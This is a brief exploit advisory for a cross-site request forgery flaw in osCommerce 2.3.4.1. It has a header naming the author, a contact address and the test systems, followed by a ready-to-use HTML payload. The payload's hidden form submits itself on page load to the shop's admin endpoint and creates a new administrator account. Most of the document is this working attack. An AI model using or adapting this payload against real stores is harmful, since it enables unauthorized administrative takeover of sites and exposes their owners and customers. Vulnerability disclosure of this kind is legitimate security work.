osCommerce version 2.3.4.1 suffers from a cross site request forgery vulnerability.
64d21e9c17ef31888252a40c93532ade2145cbbb94a130c30197fd0dc56cbc3a
# Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: Hesam.Bazvand1994@gmail.com
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
exploit:
<html>
<form name="administrator" action="
http://localhost/osCommerce/admin/administrators.php?action=insert"
method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
<body name="administrator" onLoad="document.administrator.submit();"></body>
</form>
</html>